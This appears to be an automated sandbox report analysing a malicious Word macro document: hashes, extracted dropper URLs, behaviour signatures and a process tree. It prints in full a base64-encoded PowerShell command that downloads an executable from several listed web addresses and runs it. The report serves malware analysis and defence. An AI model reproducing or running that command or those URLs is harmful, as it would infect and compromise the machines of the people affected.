Analysis

  • max time kernel
    104s
  • max time network
    47s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    20-05-2022 22:08

General

  • Target

    sample.doc

  • Size

    169KB

  • MD5

    0dbbff251aba81a1d865fc9159766c65

  • SHA1

    5fb8a73a944403590bcdfff858c1247f0f543924

  • SHA256

    ee5765cc9b118bc6b24079a4701e6ff2d9d91719f9fd11536b6448364b217cb2

  • SHA512

    299f03412b42bb4c939398cea2e67f28f2bb7a8b3add49b2f1698639a8f02a6cfa6068457f172f09d8bfe1212e87a815594c16c2d5eac26a612ad8c18e43d09e

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://manandvanwaterlooville.co.uk/wp-admin/prX892/

exe.dropper

https://uniral.com/captchasignup/4J579681/

exe.dropper

https://scyzm.net/lkx7/lqoH8S/

exe.dropper

https://amagna.nl/DZ9MzAobu3/37Z/

exe.dropper

https://nilinkeji.com/online/90fb31/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 9 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\sample.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:388
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1416
    • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
      powersheLL -e JABWAEEARgBHAEsAaQBqAGMAPQAnAEoAQwBNAEQATQBiAHgAYQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAARQBgAEMAdQBSAGkAVABZAFAAUgBPAFQAYABvAGMAbwBMACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQAQQBXAEUAVgBSAGYAaQBzACAAPQAgACcANAAzADIAJwA7ACQAUQBNAFgAVQBNAHQAcQB4AD0AJwBIAFgAVwBTAFEAcABjAGwAJwA7ACQATABaAEYASQBYAGgAdQB2AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABBAFcARQBWAFIAZgBpAHMAKwAnAC4AZQB4AGUAJwA7ACQARQBQAFcAWgBWAGMAbAB0AD0AJwBXAEoAQwBZAFIAdQB5AGMAJwA7ACQARABVAEMASwBOAG8AbABsAD0ALgAoACcAbgAnACsAJwBlAHcALQBvAGIAagBlACcAKwAnAGMAdAAnACkAIABuAGUAVAAuAFcAZQBiAEMATABJAGUATgBUADsAJABZAEoARgBQAEkAcwByAHUAPQAnAGgAdAB0AHAAOgAvAC8AbQBhAG4AYQBuAGQAdgBhAG4AdwBhAHQAZQByAGwAbwBvAHYAaQBsAGwAZQAuAGMAbwAuAHUAawAvAHcAcAAtAGEAZABtAGkAbgAvAHAAcgBYADgAOQAyAC8AKgBoAHQAdABwAHMAOgAvAC8AdQBuAGkAcgBhAGwALgBjAG8AbQAvAGMAYQBwAHQAYwBoAGEAcwBpAGcAbgB1AHAALwA0AEoANQA3ADkANgA4ADEALwAqAGgAdAB0AHAAcwA6AC8ALwBzAGMAeQB6AG0ALgBuAGUAdAAvAGwAawB4ADcALwBsAHEAbwBIADgAUwAvACoAaAB0AHQAcABzADoALwAvAGEAbQBhAGcAbgBhAC4AbgBsAC8ARABaADkATQB6AEEAbwBiAHUAMwAvADMANwBaAC8AKgBoAHQAdABwAHMAOgAvAC8AbgBpAGwAaQBuAGsAZQBqAGkALgBjAG8AbQAvAG8AbgBsAGkAbgBlAC8AOQAwAGYAYgAzADEALwAnAC4AIgBTAGAAcABsAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFgARwBTAE0AVQBsAGEAdQA9ACcATgBKAFcATwBLAHEAbAB2ACcAOwBmAG8AcgBlAGEAYwBoACgAJABEAE8AQgBCAEkAeQB5AG0AIABpAG4AIAAkAFkASgBGAFAASQBzAHIAdQApAHsAdAByAHkAewAkAEQAVQBDAEsATgBvAGwAbAAuACIAZABvAHcAYABOAGwATwBhAEQAYABGAEkAbABFACIAKAAkAEQATwBCAEIASQB5AHkAbQAsACAAJABMAFoARgBJAFgAaAB1AHYAKQA7ACQATgBRAFIAVgBKAHQAaAB0AD0AJwBHAEoARwBCAFUAbgBzAGUAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABMAFoARgBJAFgAaAB1AHYAKQAuACIATABgAGUAbgBgAEcAVABIACIAIAAtAGcAZQAgADIANAAwADUANAApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAQwByAEUAYABBAFQARQAiACgAJABMAFoARgBJAFgAaAB1AHYAKQA7ACQAUwBWAEwAWgBBAHYAeQBrAD0AJwBJAFoATQBNAFYAeQBrAGwAJwA7AGIAcgBlAGEAawA7ACQAQwBXAFoARgBBAHgAdABsAD0AJwBMAE8ASQBXAEcAbABzAGQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQwBSAFEAWgBLAGoAcgBsAD0AJwBUAFcASwBEAEoAYwBtAGIAJwA=
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:364

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/364-81-0x000007FEFC451000-0x000007FEFC453000-memory.dmp
      Filesize

      8KB

    • memory/364-86-0x00000000027CB000-0x00000000027EA000-memory.dmp
      Filesize

      124KB

    • memory/364-85-0x000000001B750000-0x000000001BA4F000-memory.dmp
      Filesize

      3.0MB

    • memory/364-84-0x000007FEF3F30000-0x000007FEF4A8D000-memory.dmp
      Filesize

      11.4MB

    • memory/364-83-0x00000000027C4000-0x00000000027C7000-memory.dmp
      Filesize

      12KB

    • memory/364-82-0x000007FEF4A90000-0x000007FEF54B3000-memory.dmp
      Filesize

      10.1MB

    • memory/388-71-0x0000000000661000-0x0000000000665000-memory.dmp
      Filesize

      16KB

    • memory/388-76-0x0000000000661000-0x0000000000665000-memory.dmp
      Filesize

      16KB

    • memory/388-63-0x0000000000661000-0x0000000000665000-memory.dmp
      Filesize

      16KB

    • memory/388-62-0x0000000000661000-0x0000000000665000-memory.dmp
      Filesize

      16KB

    • memory/388-64-0x0000000000661000-0x0000000000665000-memory.dmp
      Filesize

      16KB

    • memory/388-66-0x0000000000661000-0x0000000000665000-memory.dmp
      Filesize

      16KB

    • memory/388-65-0x0000000000661000-0x0000000000665000-memory.dmp
      Filesize

      16KB

    • memory/388-68-0x0000000000661000-0x0000000000665000-memory.dmp
      Filesize

      16KB

    • memory/388-67-0x0000000000661000-0x0000000000665000-memory.dmp
      Filesize

      16KB

    • memory/388-69-0x0000000000661000-0x0000000000665000-memory.dmp
      Filesize

      16KB

    • memory/388-54-0x0000000072F41000-0x0000000072F44000-memory.dmp
      Filesize

      12KB

    • memory/388-70-0x0000000000661000-0x0000000000665000-memory.dmp
      Filesize

      16KB

    • memory/388-72-0x0000000000661000-0x0000000000665000-memory.dmp
      Filesize

      16KB

    • memory/388-74-0x0000000000661000-0x0000000000665000-memory.dmp
      Filesize

      16KB

    • memory/388-73-0x0000000000661000-0x0000000000665000-memory.dmp
      Filesize

      16KB

    • memory/388-61-0x0000000000661000-0x0000000000665000-memory.dmp
      Filesize

      16KB

    • memory/388-75-0x0000000000661000-0x0000000000665000-memory.dmp
      Filesize

      16KB

    • memory/388-77-0x0000000000661000-0x0000000000665000-memory.dmp
      Filesize

      16KB

    • memory/388-78-0x0000000000661000-0x0000000000665000-memory.dmp
      Filesize

      16KB

    • memory/388-79-0x0000000000661000-0x0000000000665000-memory.dmp
      Filesize

      16KB

    • memory/388-80-0x0000000000661000-0x0000000000665000-memory.dmp
      Filesize

      16KB

    • memory/388-60-0x0000000000661000-0x0000000000665000-memory.dmp
      Filesize

      16KB

    • memory/388-59-0x0000000000661000-0x0000000000665000-memory.dmp
      Filesize

      16KB

    • memory/388-58-0x00000000719AD000-0x00000000719B8000-memory.dmp
      Filesize

      44KB

    • memory/388-57-0x0000000076C81000-0x0000000076C83000-memory.dmp
      Filesize

      8KB

    • memory/388-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/388-55-0x00000000709C1000-0x00000000709C3000-memory.dmp
      Filesize

      8KB

    • memory/388-89-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1416-87-0x0000000000000000-mapping.dmp